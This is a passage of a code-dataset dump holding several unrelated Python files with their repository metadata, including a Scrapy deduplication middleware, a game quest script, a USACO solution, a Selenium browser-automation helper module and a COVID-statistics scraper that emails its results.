port=5001)","repo_name":"tomdan95/SDEtelegram-calendar-bot","sub_path":"GoogleOAuth2Interface/GoogleOAuth2Interface-main.py","file_name":"GoogleOAuth2Interface-main.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23898149578","text":"import sys\nreload(sys)\nsys.setdefaultencoding('UTF8')\nimport scrapy\n\nfrom preprocessing import HashVect\nfrom preprocessing import HTMLPreprocessing\nsys.path.append('SparseLSH-master/sparselsh/')\nfrom lsh import LSH\n\nclass DeduplicationMiddleware(object):\n\tdef process_spider_input(self,response, spider):\n\t\tcontent = HTMLPreprocessing(response.body).getText()\n\t\tfor object in self._lsh.query(self._hashvect.getVect(content),distance_func='cosine'):\n\t\t\tif float(object[1]) < self._dTrehold:\n\t\t\t\traise scrapy.exceptions.DropItem('Item has been identified as duplicate by LSH. Distance: ' + str(object[1]))\n\t\tself._lsh.index(self._hashvect.getVect(content),extra_data=response.url)\n\t\treturn None\n\n\tdef process_spider_output(self,response, result, spider):\n\t\treturn result\n\n\tdef process_spider_exception(self,response, exception, spider):\n\t\treturn None\n\n\tdef __init__(self,digest_length,num_hashtables,dTreshold): \n\t\tself._dTrehold = dTreshold\n\t\tself._lsh = LSH(digest_length,2**20,storage_config=None,num_hashtables=num_hashtables)\n\t\tself._hashvect = HashVect()\n\n\t@classmethod\n\tdef from_crawler(cls, crawler):\n\t\tif not crawler.settings.getint('DIGEST_LENGTH'):\n\t\t\traise scrapy.exceptions.NotConfigured('DIGEST_LENGTH missing')\n\t\tif not crawler.settings.getint('NUM_HASHTABLES'):\n\t\t\traise scrapy.exceptions.NotConfigured('NUM_HASHTABLES missing')\n\t\tif not crawler.settings.getfloat('DIST_TRESHOLD'):\n\t\t\traise scrapy.exceptions.NotConfigured('DIST_THRESHOLD missing')\n\n\t\tdigest_length = crawler.settings.getint('NUM_HASHTABLES')\n\t\tnum_hashtables = crawler.settings.getint('DIGEST_LENGTH')\n\t\tdTreshold = crawler.settings.getfloat('DIST_TRESHOLD')\n\n\t\text = cls(digest_length,num_hashtables,dTreshold)\n\t\treturn ext\n\n","repo_name":"stteffen58/scrapy-deduplication","sub_path":"deduplicationmiddleware/deduplicationmiddleware/spiders/deduplicationmiddleware.py","file_name":"deduplicationmiddleware.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36846370471","text":"import main_loop\n\n\n#initiate variables\nserial_port='/dev/ttyACM0' #'/dev/ttyACM1'\nimgdir=\"/home/pi/Desktop/Captures/\"\nimgprefix=\"CapF\"\n\n#initiate main loop\nloop=main_loop.main_loop(serial_port)\n\n\ndef RunTests():\n\n #Arm Movement Testing\n #loop.test_arm()\n #loop.test_arm_XYZ(5,5,-9)\n loop.test_arm_home()\n #loop.test_arm_home_plane()\n #loop.test_arm_clearcamera()\n\ndef RunPickandPlace():\n #Run Pick and Place\n \n fullscreen=False\n detectXYZ=True\n calculateXYZ=True\n move_arm=True\n loop.capturefromPiCamera(imgdir,imgprefix,fullscreen,detectXYZ,calculateXYZ,move_arm)\n\ndef ImageDetection():\n #Work on Image Detection (press ESC when done, Space to capture image)\n loop.test_arm_clearcamera()\n\n fullscreen=False\n #set detect XYZ to False when you want to use this loop to capture pictures (press spacebar)\n detectXYZ=True\n #set calculateXYZ to enable real world XYZ to be calculated\n calculateXYZ=True\n move_arm=False\n loop.capturefromPiCamera(imgdir,imgprefix,fullscreen,detectXYZ,calculateXYZ,move_arm)\n\n loop.test_arm_home()\n\n\n\n#RunTests()\n#RunPickandPlace()\nImageDetection()\n","repo_name":"pacogarcia3/hta0-horizontal-robot-arm","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"53"} +{"seq_id":"36408788170","text":"# Made by Mr. Have fun! Version 0.2\n# Version 0.3 by H1GHL4ND3R\nimport sys\nfrom com.it.br import Config \nfrom com.it.br.gameserver.model.quest import State\nfrom com.it.br.gameserver.model.quest import QuestState\nfrom com.it.br.gameserver.model.quest.jython import QuestJython as JQuest\n\nqn = \"106_ForgottenTruth\"\n\nONYX_TALISMAN1, ONYX_TALISMAN2, ANCIENT_SCROLL, \\\nANCIENT_CLAY_TABLET, KARTAS_TRANSLATION, ELDRITCH_DAGGER \\\n= range(984,990)\n\nORC = 27070\n\nclass Quest (JQuest) :\n\n def __init__(self,id,name,descr): \n JQuest.__init__(self,id,name,descr)\n self.questItemIds = [ONYX_TALISMAN1, ONYX_TALISMAN2, ANCIENT_SCROLL, ANCIENT_CLAY_TABLET, KARTAS_TRANSLATION]\n\n def onEvent (self,event,st) :\n htmltext = event\n if event == \"30358-05.htm\" :\n st.giveItems(ONYX_TALISMAN1,1)\n st.set(\"cond\",\"1\")\n st.setState(STARTED)\n st.playSound(self.SOUND_QUEST_START)\n return htmltext\n\n def onTalk (self,npc,player):\n npcId = npc.getNpcId()\n htmltext = self.NO_QUEST\n st = player.getQuestState(qn)\n if not st : return htmltext\n\n id = st.getState()\n if id == CREATED : # Check if is starting the quest\n st.set(\"cond\",\"0\")\n if player.getRace().ordinal() == 2 :\n if player.getLevel() >= 10 :\n htmltext = \"30358-03.htm\"\n else:\n htmltext = \"30358-02.htm\"\n st.exitQuest(1)\n else :\n htmltext = \"30358-00.htm\"\n st.exitQuest(1)\n elif id == COMPLETED : # Check if the quest is already made\n htmltext = self.QUEST_DONE\n else : # The quest itself\n try :\n cond = st.getInt(\"cond\")\n except :\n cond = None\n if cond == 1 :\n if npcId == 30358 :\n htmltext = \"30358-06.htm\"\n elif npcId == 30133 and st.getQuestItemsCount(ONYX_TALISMAN1) and id == STARTED : \n htmltext = \"30133-01.htm\"\n st.takeItems(ONYX_TALISMAN1,1)\n st.giveItems(ONYX_TALISMAN2,1)\n st.set(\"cond\",\"2\")\n elif cond == 2 :\n if npcId == 30358 :\n htmltext = \"30358-06.htm\"\n elif npcId == 30133 :\n htmltext = \"30133-02.htm\"\n elif cond == 3 :\n if npcId == 30358 :\n htmltext = \"30358-06.htm\"\n elif npcId == 30133 and st.getQuestItemsCount(ANCIENT_SCROLL) and st.getQuestItemsCount(ANCIENT_CLAY_TABLET) and id == STARTED :\n htmltext = \"30133-03.htm\"\n st.takeItems(ONYX_TALISMAN2,1)\n st.takeItems(ANCIENT_SCROLL,1)\n st.takeItems(ANCIENT_CLAY_TABLET,1)\n st.giveItems(KARTAS_TRANSLATION,1)\n st.set(\"cond\",\"4\")\n elif cond == 4 :\n if npcId == 30358 and st.getQuestItemsCount(KARTAS_TRANSLATION) :\n htmltext = \"30358-07.htm\"\n st.takeItems(KARTAS_TRANSLATION,1)\n st.giveItems(ELDRITCH_DAGGER,1)\n for item in range(4412,4417) :\n st.giveItems(item,int(10*Config.RATE_QUESTS_REWARD))\n st.giveItems(1060,int(100*Config.RATE_QUESTS_REWARD))\n if player.getClassId().isMage() and st.getInt(\"onlyone\") == 0:\n st.giveItems(2509,500)\n if player.getLevel() < 25 and player.isNewbie():\n st.giveItems(5790,3000)\n elif st.getInt(\"onlyone\") == 0:\n st.giveItems(1835,1000)\n st.unset(\"cond\")\n st.setState(COMPLETED)\n st.playSound(SOUND_QUEST_DONE)\n elif npcId == 30133 and id == STARTED :\n htmltext = \"30133-04.htm\"\n return htmltext\n\n def onKill(self,npc,player,isPet):\n st = player.getQuestState(qn)\n if not st : return\n if st.getState() != STARTED : return\n \n if st.getInt(\"cond\") == 2 :\n if st.getRandom(100) < 20 :\n if st.getQuestItemsCount(ANCIENT_SCROLL) == 0 :\n st.giveItems(ANCIENT_SCROLL,1)\n st.playSound(self.SOUND_ITEM_GET)\n elif st.getQuestItemsCount(ANCIENT_CLAY_TABLET) == 0 :\n st.giveItems(ANCIENT_CLAY_TABLET,1)\n st.playSound(self.SOUND_QUEST_MIDDLE)\n st.set(\"cond\",\"3\")\n return\n\nQUEST = Quest(106,qn,\"Forgotten Truth\")\nCREATED = State('Start', QUEST)\nSTARTING = State('Starting', QUEST)\nSTARTED = State('Started', QUEST)\nCOMPLETED = State('Completed', QUEST)\n\nQUEST.setInitialState(CREATED)\nQUEST.addStartNpc(30358)\n\nQUEST.addTalkId(30358)\n\nQUEST.addTalkId(30133)\n\nQUEST.addKillId(27070)","repo_name":"L2jBrasil/L2jBrasil","sub_path":"L2JBrasil_DP/data/jscript/quests/106_ForgottenTruth/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4286,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"16215307830","text":"import sys\n\nmul = lambda: map(int, input().strip().split())\nseq = lambda: list(map(int, input().strip().split()))\nspl = lambda: input().strip().split()\nreadInt = lambda: int(input())\nreadLine = lambda: input().strip()\n\nsys.stdin = open(\"traffic.in\", \"r\")\nsys.stdout = open(\"traffic.out\", \"w\")\n\nn = readInt()\nl = []\nhighForward = 10**6\nlowForward = -10**6\nhighBack = 10**6\nlowBack = -10**6\n\nfor _ in range(n):\n l.append(spl())\n\nfor a in l:\n if a[0] == \"none\":\n highForward = min(highForward, int(a[2]))\n lowForward = max(lowForward, int(a[1]))\n if a[0] == \"on\":\n highForward += int(a[2])\n lowForward += int(a[1])\n if a[0] == \"off\":\n highForward -= int(a[1])\n lowForward -= int(a[2])\n\nfor a in reversed(l):\n if a[0] == \"none\":\n highBack = min(highBack, int(a[2]))\n lowBack = max(lowBack, int(a[1]))\n if a[0] == \"on\":\n highBack -= int(a[1])\n lowBack -= int(a[2])\n if a[0] == \"off\":\n highBack += int(a[2])\n lowBack += int(a[1])\n\nprint(max(0, lowBack), max(0, lowBack, highBack))\nprint(max(0, lowForward), max(0, lowForward, highForward))","repo_name":"adnaneaabbar/USACO-Guide","sub_path":"traffic.py","file_name":"traffic.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"19166076473","text":"from typing import Dict, Optional, Tuple\r\n\r\ndef download_file(url, path=None, chunk_size=10**5, show_progress=True) -> str:\r\n\t''' Downloads a file keeping track of the progress. Returns the output path. '''\r\n\tfrom requests import get\r\n\tfrom simpler.format import human_seconds, human_bytes\r\n\tfrom sys import stdout\r\n\tfrom time import time\r\n\tif path is None: path = url.split('/')[-1]\r\n\tr = get(url, stream=True)\r\n\ttotal_bytes = int(r.headers.get('content-length'))\r\n\tbytes_downloaded = 0\r\n\tstart = time()\r\n\tif show_progress: print('Downloading %s (%s)' % (url, human_bytes(total_bytes)))\r\n\twith open(path, 'wb') as fp:\r\n\t\tfor chunk in r.iter_content(chunk_size=chunk_size):\r\n\t\t\tif not chunk: continue\r\n\t\t\tfp.write(chunk)\r\n\t\t\tif show_progress:\r\n\t\t\t\tbytes_downloaded += len(chunk)\r\n\t\t\t\tpercent = bytes_downloaded / total_bytes\r\n\t\t\t\tbar = ('█' * int(percent * 32)).ljust(32)\r\n\t\t\t\ttime_delta = time() - start\r\n\t\t\t\teta = human_seconds((total_bytes - bytes_downloaded) * time_delta / bytes_downloaded)\r\n\t\t\t\tavg_speed = human_bytes(bytes_downloaded / time_delta).rjust(9)\r\n\t\t\t\tstdout.flush()\r\n\t\t\t\tstdout.write('\\r %6.02f%% |%s| %s/s eta %s' % (100 * percent, bar, avg_speed, eta))\r\n\tif show_progress: print()\r\n\treturn path\r\n\r\nclass DownloaderPool:\r\n\r\n\tdef __init__(self, num_workers=100, download_method=None):\r\n\t\tself.num_workers = num_workers\r\n\t\tself.pending_urls = []\r\n\t\tself.responses = {}\r\n\t\tself.workers = None\r\n\t\tif download_method is None:\r\n\t\t\tfrom urllib.request import urlopen\r\n\t\t\tself.download_method = lambda url: urlopen(url, timeout=5).read()\r\n\t\telse:\r\n\t\t\tself.download_method = download_method\r\n\r\n\tdef spawn_workers(self):\r\n\t\tfrom threading import Thread\r\n\t\tself.workers = [Thread(target=self.download_worker) for _ in range(self.num_workers)]\r\n\t\t[w.start() for w in self.workers]\r\n\r\n\tdef download_worker(self):\r\n\t\tfrom traceback import print_exc\r\n\t\twhile len(self.pending_urls):\r\n\t\t\turl = self.pending_urls.pop()\r\n\t\t\ttry:\r\n\t\t\t\tres = self.download_method(url)\r\n\t\t\texcept:\r\n\t\t\t\tprint_exc()\r\n\t\t\t\tres = None\r\n\t\t\tself.responses[url] = res\r\n\r\n\tdef get(self, urls):\r\n\t\tself.pending_urls.extend(urls)\r\n\t\trequest_pending_urls = urls[:]\r\n\t\tself.spawn_workers()\r\n\t\twhile len(request_pending_urls):\r\n\t\t\tfor url in request_pending_urls:\r\n\t\t\t\tif url in self.responses:\r\n\t\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tcontinue\r\n\t\t\tyield url, self.responses[url]\r\n\t\t\tdel self.responses[url]\r\n\t\t\trequest_pending_urls.remove(url)\r\n\r\n_throttle_last = 0\r\ndef throttle(seconds: float = 1) -> None:\r\n\t''' Sleeps the thread so that the function is called every X seconds. '''\r\n\tglobal _throttle_last\r\n\tfrom time import sleep, time\r\n\tnow = time()\r\n\tremaining = _throttle_last + seconds - now\r\n\tif remaining > 0:\r\n\t\tsleep(remaining)\r\n\t\t_throttle_last += seconds\r\n\telse:\r\n\t\t_throttle_last = now\r\n\r\nclass Driver:\r\n\r\n\t_CONSOLE_LEVELS = 'debug', 'info', 'log', 'warn', 'error'\r\n\t_YEAR_SECONDS = 365.4 * 24 * 3600\r\n\t_WAIT_POLL_EACH = .1\r\n\r\n\tdef __init__(\r\n\t\tself, timeout: int = 3, keystroke_delay: int = .005, headless: bool = True, disable_flash: bool = True,\r\n\t\tdisable_images: bool = True, language: str = 'en-US, en', options: Dict[str, str] = None\r\n\t):\r\n\t\tfrom autoselenium import Firefox\r\n\t\tfrom selenium.webdriver.firefox.options import Options\r\n\t\topts = Options()\r\n\t\topts.set_preference('intl.accept_languages', language)\r\n\t\tif options is not None:\r\n\t\t\t[opts.set_preference(k, v) for k, v in options.items()]\r\n\t\tself.driver = Firefox(headless=headless, disable_flash=disable_flash, disable_images=disable_images, options=opts)\r\n\t\tself.timeout = timeout\r\n\t\tself.keystroke_delay = keystroke_delay\r\n\r\n\tdef browse(self, path: str):\r\n\t\tfrom selenium.webdriver.support.ui import WebDriverWait\r\n\t\tself.driver.get(path)\r\n\t\tWebDriverWait(self.driver, self.timeout).until(lambda d: d.execute_script('return document.readyState') == 'complete')\r\n\t\tself.driver.execute_script('window.CONSOLE_MESSAGES = [];%s' % ';'.join(\r\n\t\t\t'console.%s = (m) => CONSOLE_MESSAGES.push([\\'%s\\', m])' % (level, level)\r\n\t\t\tfor level in self._CONSOLE_LEVELS\r\n\t\t))\r\n\r\n\tdef wait(self, element: str, message: str = None, raise_errors: bool = True, invert: bool = False) -> bool:\r\n\t\tfrom selenium.common.exceptions import TimeoutException\r\n\t\tfrom selenium.webdriver.common.by import By\r\n\t\tfrom selenium.webdriver.support import expected_conditions as EC\r\n\t\tfrom selenium.webdriver.support.ui import WebDriverWait\r\n\t\ttry:\r\n\t\t\tif invert:\r\n\t\t\t\tWebDriverWait(self.driver, self.timeout).until_not(EC.presence_of_element_located((By.CSS_SELECTOR, element)))\r\n\t\t\telse:\r\n\t\t\t\tWebDriverWait(self.driver, self.timeout).until(EC.presence_of_element_located((By.CSS_SELECTOR, element)))\r\n\t\t\treturn True\r\n\t\texcept TimeoutException as e:\r\n\t\t\tif raise_errors:\r\n\t\t\t\tif message is None:\r\n\t\t\t\t\tmessage = 'Timeout waiting for element to disappear: ' if invert else 'Timeout waiting for element to appear: '\r\n\t\t\t\traise AssertionError(message + element) from e\r\n\t\treturn False\r\n\r\n\tdef wait_for_url(self, url: str, message: str = None, raise_errors: bool = True, invert: bool = False) -> bool:\r\n\t\tfrom selenium.common.exceptions import TimeoutException\r\n\t\tfrom selenium.webdriver.support import expected_conditions as EC\r\n\t\tfrom selenium.webdriver.support.ui import WebDriverWait\r\n\t\ttry:\r\n\t\t\tif invert:\r\n\t\t\t\tWebDriverWait(self.driver, self.timeout).until_not(EC.url_to_be(url))\r\n\t\t\telse:\r\n\t\t\t\tWebDriverWait(self.driver, self.timeout).until(EC.url_to_be(url))\r\n\t\t\treturn True\r\n\t\texcept TimeoutException as e:\r\n\t\t\tif raise_errors:\r\n\t\t\t\tif message is None:\r\n\t\t\t\t\tmessage = 'Timeout waiting for URL to not be: ' if invert else 'Timeout waiting for URL to be: '\r\n\t\t\t\traise AssertionError(message + url) from e\r\n\t\treturn False\r\n\r\n\tdef wait_for_file(self, path: str, message: str = 'Timeout waiting for file: ', raise_errors=True) -> bool:\r\n\t\tfrom os.path import exists\r\n\t\tfrom time import sleep, time\r\n\t\tstart = time()\r\n\t\twhile True:\r\n\t\t\tif exists(path): return True\r\n\t\t\telapsed = time() - start\r\n\t\t\tif elapsed > self.timeout:\r\n\t\t\t\tif raise_errors:\r\n\t\t\t\t\traise AssertionError(message + path)\r\n\t\t\t\treturn False\r\n\t\t\tsleep(self._WAIT_POLL_EACH)\r\n\r\n\tdef select(self, element, wait: bool = True, all: bool = False, raise_errors: bool = None):\r\n\t\tfrom selenium.webdriver.remote.webelement import WebElement\r\n\t\tif isinstance(element, WebElement): return element\r\n\t\tfound = self.wait(element, raise_errors=not all if raise_errors is None else raise_errors) if wait else False\r\n\t\tif all:\r\n\t\t\treturn self.driver.find_elements_by_css_selector(element)\r\n\t\telif found:\r\n\t\t\treturn self.driver.find_element_by_css_selector(element)\r\n\r\n\tdef write(self, element, text: str, clear: bool = False) -> None:\r\n\t\tfrom selenium.webdriver.common.action_chains import ActionChains\r\n\t\tfrom selenium.webdriver.common.keys import Keys\r\n\t\tfrom time import sleep\r\n\t\telement = self.select(element)\r\n\t\tif clear:\r\n\t\t\tself.click(element)\r\n\t\t\tActionChains(self.driver).key_down(Keys.CONTROL).send_keys('a').key_up(Keys.CONTROL).send_keys(Keys.BACKSPACE).perform()\r\n\t\tfor char in text:\r\n\t\t\telement.send_keys(self.translate(char))\r\n\t\t\tsleep(self.keystroke_delay)\r\n\r\n\tdef press(self, text: str):\r\n\t\tfrom selenium.webdriver.common.action_chains import ActionChains\r\n\t\tfrom time import sleep\r\n\t\tfor char in text:\r\n\t\t\tActionChains(self.driver).send_keys(self.translate(char)).perform()\r\n\t\t\tsleep(self.keystroke_delay)\r\n\r\n\tdef click(self, element) -> None:\r\n\t\tself.select(element).click()\r\n\r\n\tdef hover(self, element) -> None:\r\n\t\tfrom selenium.webdriver.common.action_chains import ActionChains\r\n\t\tActionChains(self.driver).move_to_element(self.select(element)).perform()\r\n\r\n\tdef focus(self, element) -> None:\r\n\t\tfrom selenium.webdriver.common.action_chains import ActionChains\r\n\t\tActionChains(self.driver).move_to_element(self.select(element)).click().perform()\r\n\r\n\tdef drag(self, element, x_offset: int = 0, y_offset: int = 0) -> None:\r\n\t\tfrom selenium.webdriver.common.action_chains import ActionChains\r\n\t\tActionChains(self.driver).drag_and_drop_by_offset(self.select(element), x_offset, y_offset).perform()\r\n\r\n\tdef scroll(self, element, x_delta: float = 0, y_delta: float = 0, mouse_x: float = 0, mouse_y: float = 0) -> None:\r\n\t\tself.driver.execute_script('''arguments[0].dispatchEvent(new WheelEvent(\"wheel\", { bubbles: true,\r\n\t\t\tdeltaX: arguments[1], deltaY: arguments[2], clientX: arguments[3], clientY: arguments[4]\r\n\t\t}))''', self.select(element), x_delta, y_delta, mouse_x, mouse_y)\r\n\r\n\tdef scroll_into_view(self, element):\r\n\t\tself.driver.execute_script('arguments[0].scrollIntoView({\"block\":\"center\"});', self.select(element))\r\n\r\n\tdef attribute(self, element, attribute: str, value: Optional[str] = None) -> Optional[str]:\r\n\t\targs = [self.select(element), attribute]\r\n\t\tif value is None:\r\n\t\t\tscript = 'return !arguments[0].hasAttribute(arguments[1]) ? null : arguments[0].getAttribute(arguments[1])'\r\n\t\telse:\r\n\t\t\tscript = 'arguments[0].setAttribute(arguments[1], arguments[2])'\r\n\t\t\targs.append(value)\r\n\t\treturn self.driver.execute_script(script, *args)\r\n\r\n\tdef style(self, element, property: str, value: Optional[str] = None) -> Optional[str]:\r\n\t\targs = [self.select(element), property]\r\n\t\tif value is None:\r\n\t\t\tscript = 'return getComputedStyle(arguments[0])[arguments[1]]'\r\n\t\telse:\r\n\t\t\tscript = 'arguments[0].style[arguments[1]] = arguments[2]'\r\n\t\t\targs.append(value)\r\n\t\treturn self.driver.execute_script(script, *args)\r\n\r\n\tdef has_class(self, element, class_name: str) -> bool:\r\n\t\treturn self.driver.execute_script(\r\n\t\t\t'return arguments[0].classList.contains(arguments[1])',\r\n\t\t\tself.select(element),\r\n\t\t\tclass_name\r\n\t\t)\r\n\r\n\tdef cookie(\r\n\t\tself, name: str, value: Optional[str] = None, expiry: int = None, delete: bool = False,\r\n\t\tpath: str = None, domain: str = None, http_only: str = None, secure: str = None\r\n\t) -> Optional[str]:\r\n\t\tfrom time import time\r\n\t\tif delete:\r\n\t\t\tself.driver.delete_cookie(name)\r\n\t\telif value is None:\r\n\t\t\treturn self.driver.get_cookie(name)['value']\r\n\t\telse:\r\n\t\t\tcookie = {'name': name, 'value': value, 'path': '/'}\r\n\t\t\tcookie['expiry'] = expiry if expiry is not None else int(time() + self._YEAR_SECONDS)\r\n\t\t\tif path is not None: cookie['path'] = path\r\n\t\t\tif domain is not None: cookie['domain'] = domain\r\n\t\t\tif http_only is not None: cookie['httpOnly'] = http_only\r\n\t\t\tif secure is not None: cookie['secure'] = secure\r\n\t\t\tself.driver.add_cookie(cookie)\r\n\r\n\tdef local_storage(self, key: str, value: Optional[str] = None, delete: bool = False) -> Optional[str]:\r\n\t\tif delete:\r\n\t\t\tself.driver.execute_script('localStorage.removeItem(arguments[0])', key)\r\n\t\telif value is None:\r\n\t\t\treturn self.driver.execute_script('return localStorage.getItem(arguments[0])', key)\r\n\t\telse:\r\n\t\t\tself.driver.execute_script('localStorage.setItem(arguments[0], arguments[1])', key, value)\r\n\r\n\tdef session_storage(self, key: str, value: Optional[str] = None, delete: bool = False) -> Optional[str]:\r\n\t\tif delete:\r\n\t\t\tself.driver.execute_script('sessionStorage.removeItem(arguments[0])', key)\r\n\t\telif value is None:\r\n\t\t\treturn self.driver.execute_script('return sessionStorage.getItem(arguments[0])', key)\r\n\t\telse:\r\n\t\t\tself.driver.execute_script('sessionStorage.setItem(arguments[0], arguments[1])', key, value)\r\n\r\n\tdef all_cookies(self, clear: bool = True, path: str = None, domain: str = None, http_only: str = None, secure: str = None) -> dict:\r\n\t\tres = {\r\n\t\t\tc['name']: c['value']\r\n\t\t\tfor c in self.driver.get_cookies()\r\n\t\t\tif (path is None or c['path'] == path)\r\n\t\t\tand (domain is None or c['domain'] == domain)\r\n\t\t\tand (http_only is None or c['httpOnly'] == http_only)\r\n\t\t\tand (secure is None or c['secure'] == secure)\r\n\t\t}\r\n\t\tif clear:\r\n\t\t\tself.driver.delete_all_cookies()\r\n\t\treturn res\r\n\r\n\tdef all_local_storage(self, clear: bool = True) -> dict:\r\n\t\tres = {k: v for k, v in self.driver.execute_script('return Object.entries(localStorage)')}\r\n\t\tif clear:\r\n\t\t\tself.driver.execute_script('localStorage.clear()')\r\n\t\treturn res\r\n\r\n\tdef all_session_storage(self, clear: bool = True) -> dict:\r\n\t\tres = {k: v for k, v in self.driver.execute_script('return Object.entries(sessionStorage)')}\r\n\t\tif clear:\r\n\t\t\tself.driver.execute_script('sessionStorage.clear()')\r\n\t\treturn res\r\n\r\n\tdef box(self, element) -> Tuple[float, float]:\r\n\t\tres = self.driver.execute_script('return arguments[0].getBoundingClientRect()', self.select(element))\r\n\t\tres['center_left'] = res['left'] + res['width'] / 2\r\n\t\tres['center_top'] = res['top'] + res['height'] / 2\r\n\t\treturn res\r\n\r\n\tdef translate(self, char: str) -> str:\r\n\t\tfrom selenium.webdriver.common.keys import Keys\r\n\t\tif char == '\\t':\r\n\t\t\treturn Keys.TAB\r\n\t\telif char == '\\n':\r\n\t\t\treturn Keys.ENTER\r\n\t\telse:\r\n\t\t\treturn char\r\n\r\n\tdef console_clear(self):\r\n\t\tself.driver.execute_script('window.CONSOLE_MESSAGES = []')\r\n\r\n\tdef console_messages(self, group_by_level: bool = False) -> Dict[str, str]:\r\n\t\tmessages = self.driver.execute_script('return CONSOLE_MESSAGES')\r\n\t\tif group_by_level:\r\n\t\t\tres = {}\r\n\t\t\tfor level, message in messages:\r\n\t\t\t\tres.setdefault(level, []).append(message)\r\n\t\t\treturn res\r\n\t\telse:\r\n\t\t\treturn [m[1] for m in messages]","repo_name":"juancroldan/simpler","sub_path":"simpler/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":12956,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"3529835464","text":"from selenium import webdriver\r\nimport smtplib\r\nimport email.message\r\nimport time\r\nfrom selenium.webdriver.chrome.options import Options\r\nimport PySimpleGUI as sg\r\n\r\n#Criado por Fabio Augusto\r\n\r\nclass Tracker():\r\n def __init__(self):\r\n chrome_options = Options()\r\n chrome_options.add_argument(\"--headless\")\r\n self.driver = webdriver.Chrome(executable_path=r'./chromedriver.exe',options=chrome_options)\r\n print('entrando no site...')\r\n self.driver.get('https://www.coronatracker.com/pt-br')\r\n self.email_message = email.message.Message()\r\n time.sleep(3)\r\n print('feito')\r\n\r\n def varrer(self):\r\n #varre dados do mundo\r\n print('iniciando varredura de dados mundial...')\r\n curados = self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[2]/div[2]/div[1]')\r\n print('curados ok')\r\n confirmados = self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[2]/div[1]/div[1]')\r\n print('confirmados ok')\r\n obitos = self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[2]/div[3]/div[1]')\r\n print('obitos ok')\r\n print('convertendo para texto')\r\n self.confirmados = confirmados.text\r\n print('confirmados ok')\r\n self.curados = curados.text\r\n print('curados ok')\r\n self.obitos = obitos.text\r\n print('obitos ok')\r\n print('feito')\r\n #varre dados do Brasil\r\n print('alterando fonte de dados para o BR...')\r\n self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[1]/button').click()\r\n self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[1]/ul/li[4]/a').click()\r\n time.sleep(3)\r\n print('feito')\r\n print('iniciando varredura de dados do Brasil ')\r\n br_confirmados = self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[2]/div[1]/div[1]')\r\n print('confirmados ok')\r\n br_curados = self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[2]/div[2]/div[1]')\r\n print('curados ok')\r\n br_obitos = self.driver.find_element_by_xpath('//*[@id=\"__layout\"]/div/main/div/div[1]/div[1]/div[1]/div[2]/div[3]/div[1]')\r\n print('obitos ok')\r\n print('feito')\r\n print('convertendo para texto')\r\n self.br_confirmados = br_confirmados.text\r\n print('confirmados ok')\r\n self.br_curados = br_curados.text\r\n print('curados ok')\r\n self.br_obitos = br_obitos.text\r\n print('obitos ok')\r\n print('dados varridos com sucesso!')\r\n time.sleep(2)\r\n\r\n def enviar_email(self, email,senha,destino):\r\n self.email = email\r\n self.senha = senha\r\n self.destino = destino\r\n print('definindo corpo do email..')\r\n corpo_email = f\"\"\"\r\n

        CORONA VIRUS STATUS

        \r\n

        \r\n

        Corona virus no mundo

        \r\n

        \r\n

        confirmados: {self.confirmados}

        \r\n

        curados:{self.curados}

        \r\n

        mortos: {self.obitos}

        \r\n

        \r\n

        \r\n

        \r\n

        Corona no Brasil

        \r\n

        \r\n

        confirmados:{self.br_confirmados}

        \r\n

        curados: {self.br_curados}

        \r\n

        mortos:{self.br_obitos}

        \r\n

        \r\n

        \r\n

        Dados retirados instantaneamente do site CoronaTrack disponivel em https://www.coronatracker.com/pt-br

        \r\n \"\"\"\r\n print('feito')\r\n print('enviando email')\r\n msg = self.email_message\r\n msg['Subject'] = \"Dados do Corona\"\r\n msg['From'] = self.email\r\n msg['To'] = self.destino\r\n password = self.senha \r\n msg.add_header('Content-Type', 'text/html')\r\n msg.set_payload(corpo_email )\r\n\r\n s = smtplib.SMTP('smtp.gmail.com: 587')\r\n s.starttls()\r\n s.login(msg['From'], password)\r\n s.sendmail(msg['From'], [msg['To']], msg.as_string().encode('utf-8'))\r\n print(f'Email enviado com sucesso para {self.destino}')\r\n time.sleep(2)\r\n \r\n def gravar_txt(self):\r\n #grava os dados do corona no mundo:\r\n print('criando arquivo')\r\n arquivo = open('casosdocorona.txt', \"w\", encoding='UTF-8')\r\n print('gravando dados do mundo...')\r\n arquivo.write('#CASOS DO CORONA NO MUNDO\\n')\r\n arquivo.write('Casos confirmados: ')\r\n arquivo.write(self.confirmados)\r\n arquivo.write('\\n')\r\n arquivo.write('Casos curados:')\r\n arquivo.write(self.curados) \r\n arquivo.write('\\n')\r\n arquivo.write('Casos com mortes: ')\r\n arquivo.write(self.obitos)\r\n arquivo.write('\\n\\n')\r\n print('feito!')\r\n \r\n #grava os dados do corona no Brasil\r\n print('gravando dados do Brasil...')\r\n arquivo.write('#CASOS DO CORONA NO BRASIL')\r\n arquivo.write('\\n')\r\n arquivo.write('confirmados:')\r\n arquivo.write(self.br_confirmados)\r\n arquivo.write('\\n')\r\n 